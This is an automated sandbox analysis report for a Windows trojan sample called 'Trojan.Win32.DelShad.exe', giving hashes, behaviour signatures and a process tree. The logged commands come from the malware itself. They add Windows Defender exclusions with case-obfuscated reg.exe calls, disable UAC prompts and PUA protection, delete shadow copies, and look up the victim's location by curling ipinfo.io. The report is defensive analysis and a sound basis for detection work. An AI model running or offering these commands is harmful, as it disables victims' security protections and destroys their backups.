Analysis
-
max time kernel
29s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
14-11-2024 23:57
Static task
static1
Behavioral task
behavioral1
Sample
Trojan.Win32.DelShad.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Trojan.Win32.DelShad.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Trojan.Win32.DelShad.exe
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral4
Sample
Trojan.Win32.DelShad.exe
Resource
win11-20241007-en
General
-
Target
Trojan.Win32.DelShad.exe
-
Size
30.2MB
-
MD5
52cc1d2fbc403848c18f3c95dd63d727
-
SHA1
9c5067b86ffc4ab6908aea7d9adf0b82353db3af
-
SHA256
a9883030a711aebd2ec7faff0091135ee590a0e6ac613a963f55e43edc00c595
-
SHA512
7e59c7ae07bca570ce162633cfac5817bc6f012168afa3a24def0c95fef3c3251648a560761e9d967db36b31e437dbd2ed2ac884d62d4c4ee61a808a830754a0
-
SSDEEP
393216:jQV5xOYevAex37XtjUIahEeBLQV5xOYevAex37XtjUIahEeBLQV5xOYevAex37Xq:cj8579oIIaj8579oIIaj8579oIIF
Malware Config
Signatures
-
Processes:
reg.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\WIndoWs defender sECuritY centEr\notIFICATions reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\WIndoWs defender sECuritY centEr\notIFICATions\dIsablEEnhAncEdnOtiFiCatiOns = "1" reg.exe Key created \REGISTRY\MACHINE\sOFTwAre\micrOsOfT\WIndoWs defender sECuritY centEr\notIFICATions reg.exe -
Processes:
reg.exereg.exereg.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsEnTPromptbehavIOrUser = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromPTOnsECUredesKtoP = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsenTPrompTbEhAvIoradmin = "0" reg.exe -
Processes:
rEG.EXErEg.EXErEg.EXEdescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\SCr = "0" rEG.EXE Key created \REGISTRY\MACHINE\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns rEg.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\Cmd = "0" rEg.EXE Key created \REGISTRY\MACHINE\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns rEg.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\EXE = "0" rEg.EXE Key created \REGISTRY\MACHINE\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs rEG.EXE -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Disables use of System Restore points 1 TTPs
-
Drops file in Drivers directory 1 IoCs
Processes:
cmd.exedescription ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts cmd.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Drops startup file 1 IoCs
Processes:
Trojan.Win32.DelShad.tmpdescription ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows11InstallationAssistant.lnk Trojan.Win32.DelShad.tmp -
Executes dropped EXE 17 IoCs
Processes:
Trojan.Win32.DelShad.tmpTrojan.Win32.DelShad.tmppik.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exeWindows11InstaIIation.scrWindows11InstaIIation.sCrpid Process 2328 Trojan.Win32.DelShad.tmp 2760 Trojan.Win32.DelShad.tmp 2268 pik.exe 2744 rp.exe 2944 rp.exe 2740 rp.exe 2888 rp.exe 2504 rp.exe 2352 rp.exe 3020 rp.exe 2948 rp.exe 1680 rp.exe 892 rp.exe 1692 rp.exe 2876 rp.exe 980 Windows11InstaIIation.scr 1312 Windows11InstaIIation.sCr -
Loads dropped DLL 9 IoCs
Processes:
Trojan.Win32.DelShad.exeTrojan.Win32.DelShad.exeTrojan.Win32.DelShad.tmpcmd.exepid Process 2136 Trojan.Win32.DelShad.exe 2820 Trojan.Win32.DelShad.exe 2760 Trojan.Win32.DelShad.tmp 3016 2280 cmd.exe 2280 cmd.exe 2280 cmd.exe 2280 cmd.exe 2760 Trojan.Win32.DelShad.tmp -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
icacls.exeicacls.exepid Process 796 icacls.exe 2072 icacls.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Windows11InstaIIation.scrdescription pid Process procid_target PID 980 set thread context of 1312 980 Windows11InstaIIation.scr 131 -
Drops file in Windows directory 1 IoCs
Processes:
makecab.exedescription ioc Process File created C:\Windows\Logs\CBS\CbsPersist_20241114235820.cab makecab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 24 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Trojan.Win32.DelShad.exeTrojan.Win32.DelShad.tmprp.exerp.exerp.exerp.execmd.exeTrojan.Win32.DelShad.tmprp.exerp.execmd.exerp.exerp.exerp.execmd.exeTrojan.Win32.DelShad.exetaskkill.exerp.exerp.exerp.exeWindows11InstaIIation.scrcmd.execmd.exeWindows11InstaIIation.sCrdescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan.Win32.DelShad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan.Win32.DelShad.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan.Win32.DelShad.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan.Win32.DelShad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Windows11InstaIIation.scr Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Windows11InstaIIation.sCr -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
find.exefind.exepid Process 1908 find.exe 2368 find.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid Process 2392 vssadmin.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid Process 2276 taskkill.exe -
Modifies data under HKEY_USERS 12 IoCs
Processes:
rp.exerp.exerp.exerp.exedescription ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" rp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" rp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" rp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ rp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" rp.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
Trojan.Win32.DelShad.tmprp.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exepid Process 2760 Trojan.Win32.DelShad.tmp 2760 Trojan.Win32.DelShad.tmp 2744 rp.exe 2744 rp.exe 2740 rp.exe 2740 rp.exe 2944 rp.exe 2944 rp.exe 2504 rp.exe 2504 rp.exe 2888 rp.exe 2888 rp.exe 2948 rp.exe 2948 rp.exe 1680 rp.exe 1680 rp.exe 1692 rp.exe 1692 rp.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskkill.exepik.exevssvc.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exeWMIC.exedescription pid Process Token: SeDebugPrivilege 2276 taskkill.exe Token: SeDebugPrivilege 2268 pik.exe Token: SeBackupPrivilege 876 vssvc.exe Token: SeRestorePrivilege 876 vssvc.exe Token: SeAuditPrivilege 876 vssvc.exe Token: SeDebugPrivilege 2744 rp.exe Token: SeAssignPrimaryTokenPrivilege 2744 rp.exe Token: SeIncreaseQuotaPrivilege 2744 rp.exe Token: 0 2744 rp.exe Token: SeDebugPrivilege 2944 rp.exe Token: SeAssignPrimaryTokenPrivilege 2944 rp.exe Token: SeIncreaseQuotaPrivilege 2944 rp.exe Token: SeDebugPrivilege 2740 rp.exe Token: SeAssignPrimaryTokenPrivilege 2740 rp.exe Token: SeIncreaseQuotaPrivilege 2740 rp.exe Token: 0 2740 rp.exe Token: SeDebugPrivilege 2504 rp.exe Token: SeAssignPrimaryTokenPrivilege 2504 rp.exe Token: SeIncreaseQuotaPrivilege 2504 rp.exe Token: 0 2504 rp.exe Token: SeDebugPrivilege 2888 rp.exe Token: SeAssignPrimaryTokenPrivilege 2888 rp.exe Token: SeIncreaseQuotaPrivilege 2888 rp.exe Token: SeDebugPrivilege 2948 rp.exe Token: SeAssignPrimaryTokenPrivilege 2948 rp.exe Token: SeIncreaseQuotaPrivilege 2948 rp.exe Token: SeDebugPrivilege 1680 rp.exe Token: SeAssignPrimaryTokenPrivilege 1680 rp.exe Token: SeIncreaseQuotaPrivilege 1680 rp.exe Token: 0 1680 rp.exe Token: SeDebugPrivilege 1692 rp.exe Token: SeAssignPrimaryTokenPrivilege 1692 rp.exe Token: SeIncreaseQuotaPrivilege 1692 rp.exe Token: SeIncreaseQuotaPrivilege 1900 WMIC.exe Token: SeSecurityPrivilege 1900 WMIC.exe Token: SeTakeOwnershipPrivilege 1900 WMIC.exe Token: SeLoadDriverPrivilege 1900 WMIC.exe Token: SeSystemProfilePrivilege 1900 WMIC.exe Token: SeSystemtimePrivilege 1900 WMIC.exe Token: SeProfSingleProcessPrivilege 1900 WMIC.exe Token: SeIncBasePriorityPrivilege 1900 WMIC.exe Token: SeCreatePagefilePrivilege 1900 WMIC.exe Token: SeBackupPrivilege 1900 WMIC.exe Token: SeRestorePrivilege 1900 WMIC.exe Token: SeShutdownPrivilege 1900 WMIC.exe Token: SeDebugPrivilege 1900 WMIC.exe Token: SeSystemEnvironmentPrivilege 1900 WMIC.exe Token: SeRemoteShutdownPrivilege 1900 WMIC.exe Token: SeUndockPrivilege 1900 WMIC.exe Token: SeManageVolumePrivilege 1900 WMIC.exe Token: 33 1900 WMIC.exe Token: 34 1900 WMIC.exe Token: 35 1900 WMIC.exe Token: SeIncreaseQuotaPrivilege 1900 WMIC.exe Token: SeSecurityPrivilege 1900 WMIC.exe Token: SeTakeOwnershipPrivilege 1900 WMIC.exe Token: SeLoadDriverPrivilege 1900 WMIC.exe Token: SeSystemProfilePrivilege 1900 WMIC.exe Token: SeSystemtimePrivilege 1900 WMIC.exe Token: SeProfSingleProcessPrivilege 1900 WMIC.exe Token: SeIncBasePriorityPrivilege 1900 WMIC.exe Token: SeCreatePagefilePrivilege 1900 WMIC.exe Token: SeBackupPrivilege 1900 WMIC.exe Token: SeRestorePrivilege 1900 WMIC.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
Trojan.Win32.DelShad.tmppid Process 2760 Trojan.Win32.DelShad.tmp -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Windows11InstaIIation.scrpid Process 980 Windows11InstaIIation.scr -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Trojan.Win32.DelShad.exeTrojan.Win32.DelShad.tmpTrojan.Win32.DelShad.exeTrojan.Win32.DelShad.tmpWScript.execmd.exedescription pid Process procid_target PID 2136 wrote to memory of 2328 2136 Trojan.Win32.DelShad.exe 30 PID 2136 wrote to memory of 2328 2136 Trojan.Win32.DelShad.exe 30 PID 2136 wrote to memory of 2328 2136 Trojan.Win32.DelShad.exe 30 PID 2136 wrote to memory of 2328 2136 Trojan.Win32.DelShad.exe 30 PID 2136 wrote to memory of 2328 2136 Trojan.Win32.DelShad.exe 30 PID 2136 wrote to memory of 2328 2136 Trojan.Win32.DelShad.exe 30 PID 2136 wrote to memory of 2328 2136 Trojan.Win32.DelShad.exe 30 PID 2328 wrote to memory of 2820 2328 Trojan.Win32.DelShad.tmp 31 PID 2328 wrote to memory of 2820 2328 Trojan.Win32.DelShad.tmp 31 PID 2328 wrote to memory of 2820 2328 Trojan.Win32.DelShad.tmp 31 PID 2328 wrote to memory of 2820 2328 Trojan.Win32.DelShad.tmp 31 PID 2328 wrote to memory of 2820 2328 Trojan.Win32.DelShad.tmp 31 PID 2328 wrote to memory of 2820 2328 Trojan.Win32.DelShad.tmp 31 PID 2328 wrote to memory of 2820 2328 Trojan.Win32.DelShad.tmp 31 PID 2820 wrote to memory of 2760 2820 Trojan.Win32.DelShad.exe 32 PID 2820 wrote to memory of 2760 2820 Trojan.Win32.DelShad.exe 32 PID 2820 wrote to memory of 2760 2820 Trojan.Win32.DelShad.exe 32 PID 2820 wrote to memory of 2760 2820 Trojan.Win32.DelShad.exe 32 PID 2820 wrote to memory of 2760 2820 Trojan.Win32.DelShad.exe 32 PID 2820 wrote to memory of 2760 2820 Trojan.Win32.DelShad.exe 32 PID 2820 wrote to memory of 2760 2820 Trojan.Win32.DelShad.exe 32 PID 2760 wrote to memory of 2276 2760 Trojan.Win32.DelShad.tmp 33 PID 2760 wrote to memory of 2276 2760 Trojan.Win32.DelShad.tmp 33 PID 2760 wrote to memory of 2276 2760 Trojan.Win32.DelShad.tmp 33 PID 2760 wrote to memory of 2276 2760 Trojan.Win32.DelShad.tmp 33 PID 2760 wrote to memory of 2268 2760 Trojan.Win32.DelShad.tmp 36 PID 2760 wrote to memory of 2268 2760 Trojan.Win32.DelShad.tmp 36 PID 2760 wrote to memory of 2268 2760 Trojan.Win32.DelShad.tmp 36 PID 2760 wrote to memory of 2268 2760 Trojan.Win32.DelShad.tmp 36 PID 1076 wrote to memory of 800 1076 WScript.exe 40 PID 1076 wrote to memory of 800 1076 WScript.exe 40 PID 1076 wrote to memory of 800 1076 WScript.exe 40 PID 800 wrote to memory of 1764 800 cmd.exe 42 PID 800 wrote to memory of 1764 800 cmd.exe 42 PID 800 wrote to memory of 1764 800 cmd.exe 42 PID 800 wrote to memory of 1668 800 cmd.exe 43 PID 800 wrote to memory of 1668 800 cmd.exe 43 PID 800 wrote to memory of 1668 800 cmd.exe 43 PID 800 wrote to memory of 1356 800 cmd.exe 44 PID 800 wrote to memory of 1356 800 cmd.exe 44 PID 800 wrote to memory of 1356 800 cmd.exe 44 PID 800 wrote to memory of 1664 800 cmd.exe 45 PID 800 wrote to memory of 1664 800 cmd.exe 45 PID 800 wrote to memory of 1664 800 cmd.exe 45 PID 800 wrote to memory of 1756 800 cmd.exe 46 PID 800 wrote to memory of 1756 800 cmd.exe 46 PID 800 wrote to memory of 1756 800 cmd.exe 46 PID 800 wrote to memory of 1708 800 cmd.exe 47 PID 800 wrote to memory of 1708 800 cmd.exe 47 PID 800 wrote to memory of 1708 800 cmd.exe 47 PID 800 wrote to memory of 2400 800 cmd.exe 48 PID 800 wrote to memory of 2400 800 cmd.exe 48 PID 800 wrote to memory of 2400 800 cmd.exe 48 PID 800 wrote to memory of 1652 800 cmd.exe 49 PID 800 wrote to memory of 1652 800 cmd.exe 49 PID 800 wrote to memory of 1652 800 cmd.exe 49 PID 800 wrote to memory of 2376 800 cmd.exe 50 PID 800 wrote to memory of 2376 800 cmd.exe 50 PID 800 wrote to memory of 2376 800 cmd.exe 50 PID 800 wrote to memory of 1732 800 cmd.exe 51 PID 800 wrote to memory of 1732 800 cmd.exe 51 PID 800 wrote to memory of 1732 800 cmd.exe 51 PID 800 wrote to memory of 892 800 cmd.exe 52 PID 800 wrote to memory of 892 800 cmd.exe 52 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Users\Admin\AppData\Local\Temp\is-M7KKU.tmp\Trojan.Win32.DelShad.tmp"C:\Users\Admin\AppData\Local\Temp\is-M7KKU.tmp\Trojan.Win32.DelShad.tmp" /SL5="$50150,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp-3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Users\Admin\AppData\Local\Temp\is-MKHMM.tmp\Trojan.Win32.DelShad.tmp"C:\Users\Admin\AppData\Local\Temp\is-MKHMM.tmp\Trojan.Win32.DelShad.tmp" /SL5="$60150,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp-4⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\system32\taskkill.exe" /f /im "Windows11InstaIIation.scr"5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\pik.exe"C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\pik.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2268
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\.cmd""5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2280 -
C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exerp.EXE /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2744 -
C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe" /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2944 -
C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe" /TI/ /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2352 -
C:\Windows\system32\rEG.EXE"C:\Windows\system32\rEG.EXE" add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F9⤵
- Windows security bypass
PID:1148
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exerP.EXE /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2740 -
C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe" /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2888 -
C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe" /TI/ /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:3020 -
C:\Windows\system32\rEg.EXE"C:\Windows\system32\rEg.EXE" Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f9⤵
- Windows security bypass
PID:1708
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exerP.EXE /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2504 -
C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe" /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2948 -
C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe" /TI/ /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:892 -
C:\Windows\system32\rEg.EXE"C:\Windows\system32\rEg.EXE" Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F9⤵
- Windows security bypass
PID:2484
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exerp.EXE /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1680 -
C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe" /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1692 -
C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe" /TI/ /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2876 -
C:\Windows\system32\rEG.EXE"C:\Windows\system32\rEG.EXE" Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f9⤵PID:2472
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\.cmd""5⤵
- System Location Discovery: System Language Discovery
PID:2016 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c CUrL -S ipINFO.io/Ip6⤵
- System Location Discovery: System Language Discovery
PID:1348
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cuRL -S IPINfo.Io/city6⤵
- System Location Discovery: System Language Discovery
PID:1232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c CUrl -s IPiNfo.io/country6⤵
- System Location Discovery: System Language Discovery
PID:1612
-
-
-
C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr"C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:980 -
C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr"C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1312
-
-
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\tmp\.vbs"1⤵
- Suspicious use of WriteProcessMemory
